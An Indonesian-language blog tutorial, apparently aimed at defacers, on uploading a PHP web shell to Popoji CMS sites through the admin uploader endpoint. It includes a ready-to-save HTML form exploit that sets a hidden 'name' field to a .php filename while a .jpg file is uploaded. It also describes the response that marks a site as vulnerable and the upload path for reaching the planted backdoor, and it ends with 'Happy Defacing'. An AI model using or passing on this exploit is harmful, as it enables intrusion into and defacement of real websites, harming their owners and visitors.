Pertama Lu harus sudah mendapatkan akses Login sebagai admin di web target !!
kalo sudah punya akun admin yang sudah terverif/aktif silahkan Lu login , sampai muncul ke page Dashbor admin
kalo dah Login, langsung buka URL bug/vuln di:
target.c0li/po-admin/js/plugins/uploader/upload.php
Ciri2 Vuln o.O ?
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}
 | |
|
<form method="post" action="target.c0li/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="nama_shell_anda.php">
<input type="submit" value="exploit">
</form>
* save dgn ekstensi .html
* lalu bukak dengan browser kalean.
upload Shell lu. ingat shell kalian disini yang kalian upload harus berEkstensi .jpg (note: shellLu.jpg) , bukanlah .php, .phtml ataupun jenis bypass ekstensi yang lainnyaa
 |
| jika berhasil . hasil output nya akan sama kyk yang pertama. tidak ada tulisan error sama sekali |
buka folder /po-upload/ , carane bukak url: target.c0li/po-content/po-upload/ , liat list yang kek di SS, carii shell lu, kalo dah ketemu Klik ae ..
kaloo pas folder /po-upload/ nya di buka ternyata muncul notice Forbidden wkkw, silahkan muter otak anda utk mencari backdoor lu wkwk.
akses shell:
target/po-content/po-upload/nama_shell_anda-[angka_random]-polibrary.php
Sekian Artikel Cara MengUpload Backdoor pada CMS Popoji.
Mudahkan x_O ?
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Defacing gan ~
Sekian dan semoga bermanfaat .. terimakasih
:O Adminnya main touch Mabar kuyy :v Loyo-ID
BalasHapus:v yok Kuy Add Fb aja :D PM :v
Hapus